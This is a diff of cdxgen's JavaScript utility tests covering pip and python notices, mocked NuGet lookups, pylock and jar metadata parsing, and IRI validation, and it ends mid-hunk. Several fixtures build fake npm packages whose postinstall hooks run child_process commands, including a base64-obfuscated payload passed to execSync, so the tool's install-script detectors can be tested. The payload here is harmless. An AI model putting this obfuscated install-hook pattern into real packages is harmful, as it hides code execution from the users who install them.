@cyclonedx/cdxgen 12.2.1 → 12.3.0

package/lib/helpers/utils.poku.js

@@ -1,9 +1,21 @@
 import { Buffer } from "node:buffer";
-import { existsSync, readFileSync, unlinkSync, writeFileSync } from "node:fs";
+import {
+  existsSync,
+  mkdirSync,
+  mkdtempSync,
+  readFileSync,
+  rmSync,
+  unlinkSync,
+  writeFileSync,
+} from "node:fs";
+import { tmpdir } from "node:os";
 import path from "node:path";
+import process from "node:process";
 
+import esmock from "esmock";
 import { PackageURL } from "packageurl-js";
 import { assert, describe, it, test } from "poku";
+import sinon from "sinon";
 import { parse } from "ssri";
 import { parse as loadYaml } from "yaml";
 
@@ -11,6 +23,7 @@ import { validateRefs } from "../validator/bomValidator.js";
 import {
   buildObjectForCocoaPod,
   buildObjectForGradleModule,
+  convertOSQueryResults,
   encodeForPurl,
   findLicenseId,
   findPnpmPackagePath,
@@ -18,11 +31,11 @@ import {
   getDartMetadata,
   getLicenses,
   getMvnMetadata,
-  getNugetMetadata,
   getPropertyGroupTextNodes,
   getPyMetadata,
   guessPypiMatchingVersion,
   hasAnyProjectType,
+  inferJarGroupFromManifest,
   isPackageManagerAllowed,
   isPartialTree,
   isValidIriReference,
@@ -71,6 +84,7 @@ import {
   parseGradleProjects,
   parseGradleProperties,
   parseHelmYamlData,
+  parseJarManifest,
   parseKVDep,
   parseLeinDep,
   parseLeiningenData,
@@ -93,6 +107,7 @@ import {
   parsePodfileLock,
   parsePodfileTargets,
   parsePom,
+  parsePomProperties,
   parsePrivadoFile,
   parsePubLockData,
   parsePubYamlData,
@@ -110,11 +125,21 @@ import {
   pnpmMetadata,
   purlFromUrlString,
   readZipEntry,
+  safeSpawnSync,
   splitOutputByGradleProjects,
   toGemModuleNames,
+  trimJarGroupSuffix,
   yarnLockToIdentMap,
 } from "./utils.js";
 
+const jarMetadataFixturesDir = path.resolve("test", "data", "jar-metadata");
+
+function readJarMetadataFixture(...segments) {
+  return readFileSync(path.join(jarMetadataFixturesDir, ...segments), {
+    encoding: "utf-8",
+  });
+}
+
 it("SSRI test", () => {
   // gopkg.lock hash
   let ss = parse(
@@ -198,6 +223,81 @@ it("finds license id from name", () => {
   );
 });
 
+it("safeSpawnSync() resets ANSI color state for host pip warnings", () => {
+  const originalConsoleWarn = console.warn;
+  const originalContainer = process.env.CDXGEN_IN_CONTAINER;
+  const originalNoticeCache = globalThis.__cdxgenNoticeCache;
+  const warnings = [];
+  delete process.env.CDXGEN_IN_CONTAINER;
+  delete globalThis.__cdxgenNoticeCache;
+  console.warn = (message) => {
+    warnings.push(message);
+  };
+
+  try {
+    safeSpawnSync("pip-cdxgen-test", ["install"], {});
+    assert.strictEqual(warnings.length, 1);
+    assert.ok(
+      warnings[0].startsWith(
+        "\x1b[1;35mNotice: pip/uv install invoked without '--only-binary'.",
+      ),
+    );
+    assert.ok(warnings[0].endsWith("\x1b[0m"));
+    assert.ok(!warnings[0].endsWith("\x1b"));
+  } finally {
+    console.warn = originalConsoleWarn;
+    if (originalContainer === undefined) {
+      delete process.env.CDXGEN_IN_CONTAINER;
+    } else {
+      process.env.CDXGEN_IN_CONTAINER = originalContainer;
+    }
+    if (originalNoticeCache === undefined) {
+      delete globalThis.__cdxgenNoticeCache;
+    } else {
+      globalThis.__cdxgenNoticeCache = originalNoticeCache;
+    }
+  }
+});
+
+it("safeSpawnSync() logs container python notices to stdout", () => {
+  const originalConsoleLog = console.log;
+  const originalConsoleWarn = console.warn;
+  const originalContainer = process.env.CDXGEN_IN_CONTAINER;
+  const originalNoticeCache = globalThis.__cdxgenNoticeCache;
+  const logs = [];
+  const warnings = [];
+  process.env.CDXGEN_IN_CONTAINER = "true";
+  delete globalThis.__cdxgenNoticeCache;
+  console.log = (message) => {
+    logs.push(message);
+  };
+  console.warn = (message) => {
+    warnings.push(message);
+  };
+
+  try {
+    safeSpawnSync("python-cdxgen-test", ["-c", "pass"], {});
+    safeSpawnSync("python-cdxgen-test", ["-c", "pass"], {});
+    assert.deepStrictEqual(logs, [
+      "Running python command without '-S' argument.",
+    ]);
+    assert.deepStrictEqual(warnings, []);
+  } finally {
+    console.log = originalConsoleLog;
+    console.warn = originalConsoleWarn;
+    if (originalContainer === undefined) {
+      delete process.env.CDXGEN_IN_CONTAINER;
+    } else {
+      process.env.CDXGEN_IN_CONTAINER = originalContainer;
+    }
+    if (originalNoticeCache === undefined) {
+      delete globalThis.__cdxgenNoticeCache;
+    } else {
+      globalThis.__cdxgenNoticeCache = originalNoticeCache;
+    }
+  }
+});
+
 it("splits parallel gradle properties output correctly", () => {
   const parallelGradlePropertiesOutput = readFileSync(
     "./test/gradle-prop-parallel.out",
@@ -2597,77 +2697,78 @@ it("parse github actions workflow data", () => {
   assert.deepStrictEqual(parseGitHubWorkflowData(null), []);
   let dep_list = parseGitHubWorkflowData("./.github/workflows/nodejs.yml");
   assert.deepStrictEqual(dep_list.length, 13);
-  assert.deepStrictEqual(dep_list[0], {
-    "bom-ref":
-      "pkg:github/actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd",
-    type: "application",
-    group: "actions",
-    name: "checkout",
-    version: "de0fac2e4500dabe0009e67214ff5f5447ce83dd",
-    purl: "pkg:github/actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd",
-    properties: [
-      {
-        name: "SrcFile",
-        value: "./.github/workflows/nodejs.yml",
-      },
-      {
-        name: "cdx:github:workflow:name",
-        value: "Node CI",
-      },
-      {
-        name: "cdx:github:workflow:file",
-        value: "./.github/workflows/nodejs.yml",
-      },
-      {
-        name: "cdx:github:job:name",
-        value: "read-node-versions",
-      },
-      {
-        name: "cdx:github:job:runner",
-        value: "ubuntu-latest",
-      },
-      {
-        name: "cdx:github:action:uses",
-        value: "actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd",
-      },
-      {
-        name: "cdx:github:action:versionPinningType",
-        value: "sha",
-      },
-      {
-        name: "cdx:github:action:isShaPinned",
-        value: "true",
-      },
-      {
-        name: "cdx:actions:isOfficial",
-        value: "true",
-      },
-      {
-        name: "cdx:github:checkout:persistCredentials",
-        value: "false",
-      },
-      {
-        name: "cdx:github:workflow:triggers",
-        value: "pull_request,push,workflow_dispatch",
-      },
-    ],
-    scope: "required",
-    evidence: {
-      identity: [
-        {
-          field: "purl",
-          confidence: 0.5,
-          methods: [
-            {
-              technique: "source-code-analysis",
-              confidence: 0.5,
-              value: "./.github/workflows/nodejs.yml",
-            },
-          ],
-        },
-      ],
-    },
-  });
+  const firstAction = dep_list[0];
+  assert.deepStrictEqual(firstAction["bom-ref"], firstAction.purl);
+  assert.deepStrictEqual(firstAction.type, "application");
+  assert.deepStrictEqual(firstAction.group, "actions");
+  assert.deepStrictEqual(firstAction.name, "checkout");
+  assert.deepStrictEqual(
+    firstAction.version,
+    "de0fac2e4500dabe0009e67214ff5f5447ce83dd",
+  );
+  assert.deepStrictEqual(
+    firstAction.purl,
+    "pkg:github/actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd",
+  );
+  assert.deepStrictEqual(firstAction.scope, "required");
+  assert.deepStrictEqual(firstAction.evidence?.identity?.[0]?.field, "purl");
+  assert.deepStrictEqual(
+    firstAction.evidence?.identity?.[0]?.methods?.[0]?.value,
+    "./.github/workflows/nodejs.yml",
+  );
+  const firstActionProps = Object.fromEntries(
+    firstAction.properties.map((prop) => [prop.name, prop.value]),
+  );
+  assert.deepStrictEqual(
+    firstActionProps.SrcFile,
+    "./.github/workflows/nodejs.yml",
+  );
+  assert.deepStrictEqual(
+    firstActionProps["cdx:github:workflow:name"],
+    "Node CI",
+  );
+  assert.deepStrictEqual(
+    firstActionProps["cdx:github:workflow:file"],
+    "./.github/workflows/nodejs.yml",
+  );
+  assert.deepStrictEqual(
+    firstActionProps["cdx:github:job:name"],
+    "read-node-versions",
+  );
+  assert.deepStrictEqual(
+    firstActionProps["cdx:github:job:runner"],
+    "ubuntu-latest",
+  );
+  assert.deepStrictEqual(
+    firstActionProps["cdx:github:action:uses"],
+    "actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd",
+  );
+  assert.deepStrictEqual(
+    firstActionProps["cdx:github:action:versionPinningType"],
+    "sha",
+  );
+  assert.deepStrictEqual(
+    firstActionProps["cdx:github:action:isShaPinned"],
+    "true",
+  );
+  assert.deepStrictEqual(firstActionProps["cdx:actions:isOfficial"], "true");
+  assert.deepStrictEqual(firstActionProps["cdx:actions:isVerified"], "false");
+  assert.deepStrictEqual(
+    firstActionProps["cdx:github:checkout:persistCredentials"],
+    "false",
+  );
+  assert.deepStrictEqual(
+    firstActionProps["cdx:github:workflow:triggers"],
+    "pull_request,push,workflow_dispatch",
+  );
+  assert.deepStrictEqual(
+    firstActionProps["cdx:github:workflow:hasPullRequestTrigger"],
+    "true",
+  );
+  assert.deepStrictEqual(
+    firstActionProps["cdx:github:workflow:hasWorkflowDispatchTrigger"],
+    "true",
+  );
   dep_list = parseGitHubWorkflowData("./test/data/github-actions-tj.yaml");
   assert.deepStrictEqual(dep_list.length, 4);
   dep_list = parseGitHubWorkflowData("./.github/workflows/repotests.yml");
@@ -3334,6 +3435,10 @@ it("get nget metadata", async () => {
       ],
       ref: "pkg:nuget/Serilog@3.0.1",
     },
+    {
+      dependsOn: ["pkg:nuget/Serilog@3.0.1"],
+      ref: "pkg:nuget/Sample@latest",
+    },
   ];
   const pkg_list = [
     {
@@ -3348,9 +3453,133 @@ it("get nget metadata", async () => {
       version: "3.0.1",
       "bom-ref": "pkg:nuget/Serilog@3.0.1",
     },
+    {
+      group: "",
+      name: "Sample",
+      version: "latest",
+      "bom-ref": "pkg:nuget/Sample@latest",
+    },
   ];
-  const { pkgList, dependencies } = await getNugetMetadata(pkg_list, dep_list);
-  // This data will need to be updated periodically as it tests that missing versions are set to the latest rc
+  const responses = new Map([
+    [
+      "https://api.nuget.org/v3/index.json",
+      {
+        body: {
+          resources: [
+            {
+              "@type": "RegistrationsBaseUrl/3.6.0",
+              "@id": "https://api.nuget.org/v3/registration3/",
+            },
+          ],
+        },
+      },
+    ],
+    [
+      "https://api.nuget.org/v3/registration3/castle.core/index.json",
+      {
+        body: {
+          items: [
+            {
+              lower: "4.0.0",
+              upper: "4.4.0",
+              items: [
+                {
+                  catalogEntry: {
+                    version: "4.4.0",
+                    description:
+                      "Castle Core, including DynamicProxy, Logging Abstractions and DictionaryAdapter",
+                    authors: "Castle Project Contributors",
+                    licenseExpression: "Apache-2.0",
+                    tags: [
+                      "Castle",
+                      "DynamicProxy",
+                      "dynamic",
+                      "proxy",
+                      "dynamicproxy2",
+                      "dictionaryadapter",
+                      "emailsender",
+                    ],
+                    projectUrl: "http://www.castleproject.org/",
+                  },
+                },
+              ],
+            },
+          ],
+        },
+      },
+    ],
+    [
+      "https://api.nuget.org/v3/registration3/serilog/index.json",
+      {
+        body: {
+          items: [
+            {
+              lower: "3.0.0",
+              upper: "3.0.1",
+              items: [
+                {
+                  catalogEntry: {
+                    version: "3.0.1",
+                    description:
+                      "Simple .NET logging with fully-structured events",
+                    authors: "Serilog Contributors",
+                    licenseExpression: "Apache-2.0",
+                    tags: ["serilog", "logging", "semantic", "structured"],
+                    projectUrl: "https://serilog.net/",
+                  },
+                },
+              ],
+            },
+          ],
+        },
+      },
+    ],
+    [
+      "https://api.nuget.org/v3/registration3/sample/index.json",
+      {
+        body: {
+          items: [
+            {
+              lower: "1.0.0",
+              upper: "1.2.3",
+              items: [
+                {
+                  catalogEntry: {
+                    version: "1.2.3",
+                    description: "Sample package for metadata tests",
+                    authors: "Sample Maintainers",
+                    licenseExpression: "MIT",
+                    tags: ["Sample", "Demo"],
+                    projectUrl: "https://example.invalid/sample",
+                  },
+                },
+              ],
+            },
+          ],
+        },
+      },
+    ],
+  ]);
+  const agentGet = sinon.stub().callsFake(async (url, options) => {
+    assert.strictEqual(options?.responseType, "json");
+    const response = responses.get(String(url));
+    assert.ok(response, `unexpected NuGet request: ${url}`);
+    return response;
+  });
+  const { getNugetMetadata: mockedGetNugetMetadata } = await esmock(
+    "./utils.js",
+    {
+      got: {
+        default: {
+          extend: sinon.stub().returns({ get: agentGet }),
+        },
+      },
+    },
+  );
+  const { pkgList, dependencies } = await mockedGetNugetMetadata(
+    pkg_list,
+    dep_list,
+  );
   assert.deepStrictEqual(pkgList, [
     {
       author: "Castle Project Contributors",
@@ -3393,8 +3622,24 @@ it("get nget metadata", async () => {
       tags: ["serilog", "logging", "semantic", "structured"],
       version: "3.0.1",
     },
+    {
+      author: "Sample Maintainers",
+      "bom-ref": "pkg:nuget/Sample@1.2.3",
+      description: "Sample package for metadata tests",
+      group: "",
+      homepage: {
+        url: "https://www.nuget.org/packages/Sample/1.2.3/",
+      },
+      license: "MIT",
+      name: "Sample",
+      repository: {
+        url: "https://example.invalid/sample",
+      },
+      tags: ["sample", "demo"],
+      version: "1.2.3",
+    },
   ]);
-  assert.deepStrictEqual(pkgList.length, 2);
+  assert.deepStrictEqual(pkgList.length, 3);
   assert.deepStrictEqual(dependencies, [
     {
       dependsOn: [
@@ -3432,6 +3677,10 @@ it("get nget metadata", async () => {
       ],
       ref: "pkg:nuget/Serilog@3.0.1",
     },
+    {
+      dependsOn: ["pkg:nuget/Serilog@3.0.1"],
+      ref: "pkg:nuget/Sample@1.2.3",
+    },
   ]);
 }, 240000);
 
@@ -3643,6 +3892,325 @@ it("parsePkgJson", async () => {
   assert.deepStrictEqual(pkgList.length, 1);
 });
 
+it("parsePkgJson emits obfuscated lifecycle-hook indicators", async () => {
+  const tempDir = mkdtempSync(path.join(tmpdir(), "cdxgen-pkgjson-"));
+  const pkgJsonFile = path.join(tempDir, "package.json");
+  const installScriptFile = path.join(tempDir, "scripts", "postinstall.js");
+  mkdirSync(path.dirname(installScriptFile), { recursive: true });
+  writeFileSync(
+    installScriptFile,
+    [
+      "import cp from 'node:child_process';",
+      "const payload = Buffer.from('ZXZhbCgnY29uc29sZS5sb2coMSknKQ==', 'base64');",
+      "cp.execSync(payload.toString());",
+    ].join("\n"),
+  );
+  writeFileSync(
+    pkgJsonFile,
+    JSON.stringify(
+      {
+        name: "suspicious-pkg",
+        version: "1.0.0",
+        scripts: {
+          postinstall: "node scripts/postinstall.js",
+        },
+      },
+      null,
+      2,
+    ),
+  );
+
+  try {
+    const pkgList = await parsePkgJson(pkgJsonFile, true, true);
+    assert.strictEqual(pkgList.length, 1);
+    const properties = pkgList[0].properties || [];
+    assert.ok(
+      properties.some(
+        (property) =>
+          property.name === "cdx:npm:hasInstallScript" &&
+          property.value === "true",
+      ),
+    );
+    assert.ok(
+      properties.some(
+        (property) =>
+          property.name === "cdx:npm:hasObfuscatedLifecycleScript" &&
+          property.value === "true",
+      ),
+    );
+    assert.ok(
+      properties.some(
+        (property) =>
+          property.name === "cdx:npm:lifecycleObfuscationIndicators" &&
+          property.value.includes("ast:buffer-base64"),
+      ),
+    );
+    assert.ok(
+      properties.some(
+        (property) =>
+          property.name === "cdx:npm:lifecycleExecutionIndicators" &&
+          property.value.includes("ast:child-process"),
+      ),
+    );
+  } finally {
+    rmSync(tempDir, { force: true, recursive: true });
+  }
+});
+
+it("parsePkgJson handles lifecycle runners with option flags", async () => {
+  const tempDir = mkdtempSync(
+    path.join(tmpdir(), "cdxgen-pkgjson-runner-flags-"),
+  );
+  const pkgJsonFile = path.join(tempDir, "package.json");
+  const preloadFile = path.join(tempDir, "preload.js");
+  const installScriptFile = path.join(tempDir, "scripts", "postinstall.js");
+  mkdirSync(path.dirname(installScriptFile), { recursive: true });
+  writeFileSync(preloadFile, "globalThis.__cdxgenPreload = true;\n");
+  writeFileSync(
+    installScriptFile,
+    [
+      "import cp from 'node:child_process';",
+      "cp.execSync('echo cdxgen');",
+    ].join("\n"),
+  );
+  writeFileSync(
+    pkgJsonFile,
+    JSON.stringify(
+      {
+        name: "runner-flags-pkg",
+        version: "1.0.0",
+        scripts: {
+          postinstall:
+            "cross-env NODE_ENV=production node --loader tsx --require ./preload.js ./scripts/postinstall.js && echo done",
+        },
+      },
+      null,
+      2,
+    ),
+  );
+
+  try {
+    const pkgList = await parsePkgJson(pkgJsonFile, true, true);
+    assert.strictEqual(pkgList.length, 1);
+    const properties = pkgList[0].properties || [];
+    assert.ok(
+      properties.some(
+        (property) =>
+          property.name === "cdx:npm:hasInstallScript" &&
+          property.value === "true",
+      ),
+    );
+    assert.ok(
+      properties.some(
+        (property) =>
+          property.name === "cdx:npm:lifecycleIndicatorMap" &&
+          property.value.includes("ast:child-process"),
+      ),
+    );
+  } finally {
+    rmSync(tempDir, { force: true, recursive: true });
+  }
+});
+
+it("parsePkgJson ignores lifecycle script files outside the package directory", async () => {
+  const tempDir = mkdtempSync(
+    path.join(tmpdir(), "cdxgen-pkgjson-outside-script-"),
+  );
+  const packageDir = path.join(tempDir, "package");
+  const pkgJsonFile = path.join(packageDir, "package.json");
+  const outsideScriptFile = path.join(tempDir, "secret.js");
+  mkdirSync(packageDir, { recursive: true });
+  writeFileSync(
+    outsideScriptFile,
+    [
+      "import cp from 'node:child_process';",
+      "cp.execSync('echo should-not-be-read');",
+    ].join("\n"),
+  );
+  writeFileSync(
+    pkgJsonFile,
+    JSON.stringify(
+      {
+        name: "outside-script-pkg",
+        version: "1.0.0",
+        scripts: {
+          postinstall: "node ../secret.js",
+        },
+      },
+      null,
+      2,
+    ),
+  );
+
+  try {
+    const pkgList = await parsePkgJson(pkgJsonFile, true, true);
+    assert.strictEqual(pkgList.length, 1);
+    const properties = pkgList[0].properties || [];
+    assert.ok(
+      properties.some(
+        (property) =>
+          property.name === "cdx:npm:hasInstallScript" &&
+          property.value === "true",
+      ),
+    );
+    assert.ok(
+      !properties.some(
+        (property) =>
+          property.name === "cdx:npm:lifecycleIndicatorMap" &&
+          property.value.includes("ast:child-process"),
+      ),
+    );
+    assert.ok(
+      !properties.some(
+        (property) =>
+          property.name === "cdx:npm:lifecycleExecutionIndicators" &&
+          property.value.includes("ast:child-process"),
+      ),
+    );
+  } finally {
+    rmSync(tempDir, { force: true, recursive: true });
+  }
+});
+
+it("parsePkgJson detects bun lifecycle runners", async () => {
+  const tempDir = mkdtempSync(
+    path.join(tmpdir(), "cdxgen-pkgjson-bun-runner-"),
+  );
+  const pkgJsonFile = path.join(tempDir, "package.json");
+  const preloadFile = path.join(tempDir, "preload.ts");
+  const installScriptFile = path.join(tempDir, "scripts", "postinstall.ts");
+  mkdirSync(path.dirname(installScriptFile), { recursive: true });
+  writeFileSync(preloadFile, "globalThis.__cdxgenPreload = true;\n");
+  writeFileSync(
+    installScriptFile,
+    ["import cp from 'node:child_process';", "cp.execSync('echo bun');"].join(
+      "\n",
+    ),
+  );
+  writeFileSync(
+    pkgJsonFile,
+    JSON.stringify(
+      {
+        name: "bun-runner-pkg",
+        version: "1.0.0",
+        scripts: {
+          postinstall:
+            "bun run --preload ./preload.ts ./scripts/postinstall.ts",
+        },
+      },
+      null,
+      2,
+    ),
+  );
+
+  try {
+    const pkgList = await parsePkgJson(pkgJsonFile, true, true);
+    assert.strictEqual(pkgList.length, 1);
+    const properties = pkgList[0].properties || [];
+    assert.ok(
+      properties.some(
+        (property) =>
+          property.name === "cdx:npm:lifecycleIndicatorMap" &&
+          property.value.includes("ast:child-process"),
+      ),
+    );
+  } finally {
+    rmSync(tempDir, { force: true, recursive: true });
+  }
+});
+
+it("parsePkgJson detects deno run lifecycle runners", async () => {
+  const tempDir = mkdtempSync(
+    path.join(tmpdir(), "cdxgen-pkgjson-deno-runner-"),
+  );
+  const pkgJsonFile = path.join(tempDir, "package.json");
+  const configFile = path.join(tempDir, "deno.json");
+  const installScriptFile = path.join(tempDir, "scripts", "postinstall.ts");
+  mkdirSync(path.dirname(installScriptFile), { recursive: true });
+  writeFileSync(configFile, '{"imports":{}}\n');
+  writeFileSync(
+    installScriptFile,
+    ["import cp from 'node:child_process';", "cp.execSync('echo deno');"].join(
+      "\n",
+    ),
+  );
+  writeFileSync(
+    pkgJsonFile,
+    JSON.stringify(
+      {
+        name: "deno-runner-pkg",
+        version: "1.0.0",
+        scripts: {
+          postinstall:
+            "deno run -A --config ./deno.json ./scripts/postinstall.ts",
+        },
+      },
+      null,
+      2,
+    ),
+  );
+
+  try {
+    const pkgList = await parsePkgJson(pkgJsonFile, true, true);
+    assert.strictEqual(pkgList.length, 1);
+    const properties = pkgList[0].properties || [];
+    assert.ok(
+      properties.some(
+        (property) =>
+          property.name === "cdx:npm:lifecycleIndicatorMap" &&
+          property.value.includes("ast:child-process"),
+      ),
+    );
+  } finally {
+    rmSync(tempDir, { force: true, recursive: true });
+  }
+});
+
+it("parsePkgJson ignores non-run deno subcommands", async () => {
+  const tempDir = mkdtempSync(
+    path.join(tmpdir(), "cdxgen-pkgjson-deno-cache-"),
+  );
+  const pkgJsonFile = path.join(tempDir, "package.json");
+  const installScriptFile = path.join(tempDir, "scripts", "postinstall.ts");
+  mkdirSync(path.dirname(installScriptFile), { recursive: true });
+  writeFileSync(
+    installScriptFile,
+    [
+      "import cp from 'node:child_process';",
+      "cp.execSync('echo deno-cache');",
+    ].join("\n"),
+  );
+  writeFileSync(
+    pkgJsonFile,
+    JSON.stringify(
+      {
+        name: "deno-cache-pkg",
+        version: "1.0.0",
+        scripts: {
+          postinstall: "deno cache ./scripts/postinstall.ts",
+        },
+      },
+      null,
+      2,
+    ),
+  );
+
+  try {
+    const pkgList = await parsePkgJson(pkgJsonFile, true, true);
+    assert.strictEqual(pkgList.length, 1);
+    const properties = pkgList[0].properties || [];
+    assert.ok(
+      !properties.some(
+        (property) =>
+          property.name === "cdx:npm:lifecycleIndicatorMap" &&
+          property.value.includes("ast:child-process"),
+      ),
+    );
+  } finally {
+    rmSync(tempDir, { force: true, recursive: true });
+  }
+});
+
 it("parsePkgLock v1", async () => {
   const parsedList = await parsePkgLock(
     "./test/data/package-json/v1/package-lock.json",
@@ -3781,6 +4349,69 @@ it("parsePkgLock v3", async () => {
   assert.deepStrictEqual(parsedList.dependenciesList.length, 161);
 });
 
+it("parsePkgLock marks devOptional entries as development", async () => {
+  const rootNode = {
+    path: "/virtual/project",
+    package: {
+      author: "",
+      license: "MIT",
+    },
+    packageName: "virtual-project",
+    version: "1.0.0",
+    edgesOut: new Map(),
+    fsChildren: new Set(),
+    children: new Map(),
+  };
+  const devOptionalNode = {
+    path: "/virtual/project/node_modules/dev-optional-dep",
+    package: {
+      author: "",
+      license: "MIT",
+    },
+    packageName: "dev-optional-dep",
+    version: "2.0.0",
+    devOptional: true,
+    integrity: "sha512-devoptional",
+    edgesOut: new Map(),
+    fsChildren: new Set(),
+    children: new Map(),
+  };
+  rootNode.children.set("node_modules/dev-optional-dep", devOptionalNode);
+  rootNode.edgesOut.set("dev-optional-dep", {
+    name: "dev-optional-dep",
+    spec: "^2.0.0",
+    to: devOptionalNode,
+  });
+  const { parsePkgLock: parsePkgLockWithMockedArborist } = await esmock(
+    "./utils.js",
+    {
+      "../third-party/arborist/lib/index.js": {
+        default: class MockArborist {
+          async loadVirtual() {
+            return rootNode;
+          }
+        },
+      },
+    },
+  );
+  const parsedList = await parsePkgLockWithMockedArborist(
+    "./test/data/package-json/v3/package-lock.json",
+    {},
+  );
+  const devOptionalPkg = parsedList.pkgList.find(
+    (pkg) => pkg["bom-ref"] === "pkg:npm/dev-optional-dep@2.0.0",
+  );
+  assert.ok(devOptionalPkg);
+  assert.deepStrictEqual(devOptionalPkg.scope, "optional");
+  assert.ok(
+    devOptionalPkg.properties.some(
+      (property) =>
+        property.name === "cdx:npm:package:development" &&
+        property.value === "true",
+    ),
+  );
+});
+
 it("parsePkgLock theia", async () => {
   const parsedList = await parsePkgLock(
     "./test/data/package-json/theia/package-lock.json",
@@ -6667,6 +7298,44 @@ it("parse python lock files", async () => {
   assert.deepStrictEqual(retMap.pkgList.length, 9);
   assert.deepStrictEqual(retMap.rootList.length, 9);
   assert.deepStrictEqual(retMap.dependenciesList.length, 9);
+  retMap = await parsePyLockData(
+    readFileSync("./test/data/pylock.toml", { encoding: "utf-8" }),
+    "./test/data/pylock.toml",
+  );
+  assert.deepStrictEqual(retMap.pkgList.length, 2);
+  assert.deepStrictEqual(retMap.dependenciesList.length, 2);
+  assert.ok(
+    retMap.pyLockProperties.some((p) => p.name === "cdx:pylock:lock_version"),
+  );
+  const attrsPkg = retMap.pkgList.find((p) => p.name === "attrs");
+  assert.ok(
+    attrsPkg.properties.some((p) => p.name === "cdx:pylock:marker"),
+    "Expected pylock marker custom property for attrs package",
+  );
+  assert.ok(
+    attrsPkg.components?.length,
+    "Expected pylock wheel entry to produce file component",
+  );
+  const cattrsPkg = retMap.pkgList.find((p) => p.name === "cattrs");
+  assert.ok(
+    cattrsPkg.properties.some(
+      (p) =>
+        p.name === "cdx:pypi:registry" &&
+        p.value === "https://internal.example/simple/",
+    ),
+    "Expected non-default pylock index to map to cdx:pypi:registry",
+  );
+  retMap = await parsePyLockData(
+    readFileSync("./test/data/pylock-named/pylock.dev.toml", {
+      encoding: "utf-8",
+    }),
+    "./test/data/pylock-named/pylock.dev.toml",
+  );
+  assert.deepStrictEqual(retMap.pkgList.length, 1);
+  assert.ok(
+    retMap.pkgList[0].components?.[0]?.hashes?.some((h) => h.alg === "SHA-256"),
+    "Expected sha-256 pylock hash to normalize to SHA-256",
+  );
 }, 120000);
 
 it("parse wheel metadata", () => {
@@ -7708,6 +8377,72 @@ it("purl encode tests", () => {
   assert.deepStrictEqual(encodeForPurl("%40angular"), "%40angular");
 });
 
+it("jar manifest group inference tests", () => {
+  const antManifest = parseJarManifest(
+    readJarMetadataFixture("ant-1.10.13", "MANIFEST.MF"),
+  );
+  assert.deepStrictEqual(
+    inferJarGroupFromManifest(antManifest),
+    "org.apache.tools.ant",
+  );
+  const velocityManifest = parseJarManifest(
+    readJarMetadataFixture("velocity-1.7", "MANIFEST.MF"),
+  );
+  assert.deepStrictEqual(velocityManifest["Extension-Name"], "velocity");
+  assert.deepStrictEqual(
+    velocityManifest["Bundle-SymbolicName"],
+    "org.apache.velocity",
+  );
+  assert.deepStrictEqual(
+    inferJarGroupFromManifest(velocityManifest),
+    "org.apache.velocity",
+  );
+});
+
+it("jar manifest inference and pom properties parsing tests", () => {
+  const logbackManifest = parseJarManifest(
+    readJarMetadataFixture("logback-classic-1.4.7", "MANIFEST.MF"),
+  );
+  const logbackPomProperties = parsePomProperties(
+    readJarMetadataFixture("logback-classic-1.4.7", "pom.properties"),
+  );
+  assert.deepStrictEqual(
+    inferJarGroupFromManifest(logbackManifest),
+    "ch.qos.logback.classic",
+  );
+  assert.deepStrictEqual(logbackPomProperties, {
+    artifactId: "logback-classic",
+    groupId: "ch.qos.logback",
+    version: "1.4.7",
+  });
+  const commonsMathManifest = parseJarManifest(
+    readJarMetadataFixture("commons-math3-3.6.1", "MANIFEST.MF"),
+  );
+  const commonsMathPomProperties = parsePomProperties(
+    readJarMetadataFixture("commons-math3-3.6.1", "pom.properties"),
+  );
+  assert.deepStrictEqual(
+    inferJarGroupFromManifest(commonsMathManifest),
+    "org.apache.commons.math3",
+  );
+  assert.deepStrictEqual(commonsMathPomProperties, {
+    artifactId: "commons-math3",
+    groupId: "org.apache.commons",
+    version: "3.6.1",
+  });
+});
+
+it("jar group suffix trimming tests", () => {
+  assert.deepStrictEqual(
+    trimJarGroupSuffix("org.checkerframework.checker.qual", "checker-qual"),
+    "org.checkerframework",
+  );
+  assert.deepStrictEqual(
+    trimJarGroupSuffix("org.apache.velocity", "velocity"),
+    "org.apache.velocity",
+  );
+});
+
 it("parsePackageJsonName tests", () => {
   assert.deepStrictEqual(parsePackageJsonName("foo"), {
     fullName: "foo",
@@ -8474,11 +9209,11 @@ const testCases = [
   // Potential ReDoS for percent-encoding regex: Long sequences of % followed by non-hex or short hex
   ["http://example.com/a%" + "a%".repeat(50000), false], // Many %a patterns
   ["http://example.com/a%" + "ab%".repeat(50000), false], // Many %ab patterns (invalid end)
-  ["http://example.com/a%" + "a".repeat(100000), false], // One % followed by many 'a's
+  ["http://example.com/a%" + "a".repeat(100000), true], // Valid: %aa is a complete encoding followed by many literal 'a's in path
   ["http://example.com/" + "%".repeat(100000), false], // Very long sequence of just %
   // Edge cases around valid percent-encoding boundaries (pushing regex engine)
   ["http://example.com/path%" + "20".repeat(30000) + "%2", false], // Valid %20s, ends with incomplete %
-  ["http://example.com/path%" + "20".repeat(30000) + "a", false], // Valid %20s, ends with non-hex
+  ["http://example.com/path%" + "20".repeat(30000) + "a", true], // Valid: %20 encoding followed by many chars and trailing literal 'a'
   // Potentially complex IRI that might be slow for validateIri (if not already robust)
   // Using a plausible but complex structure with lots of valid non-ASCII chars (requires UTF-8 support)
   // Note: Actual performance depends on the `validateIri` implementation.
@@ -8498,7 +9233,7 @@ const testCases = [
   // IRI with complex query and fragment (tests boundaries)
   [
     "https://example.com/path?query=with%20lots%20of%20percent%20encoding%20but%20valid%20%C3%A9%C3%B1#fragment-with-unicode-çhars-üñíçødé",
-    false,
+    true, // Valid: %20 and %C3%A9%C3%B1 are correct encodings; RFC 3987 allows unicode in fragment
   ],
   // IRI that looks almost like a bomLink but isn't quite (tests scheme handling)
   ["urn:cdx:some-uuid/1#componentA/extra", true], // Might be valid IRI/URI, depends on urn:cdx spec, but structurally okay for IRI
@@ -8526,7 +9261,9 @@ const testCases = [
   ["http://example.com/path%ab%cd%eg", false], // Invalid: %eg
   ["http://example.com/path%ab%cd%", false], // Invalid: trailing %
   ["http://example.com/path%ab%cd%0", false], // Invalid: %0
-  ["http://example.com/path%ab%cd%0Z", false], // Invalid: %0Z (Z is hex, but makes the sequence too long if interpreted as %ab%cd%0Z)
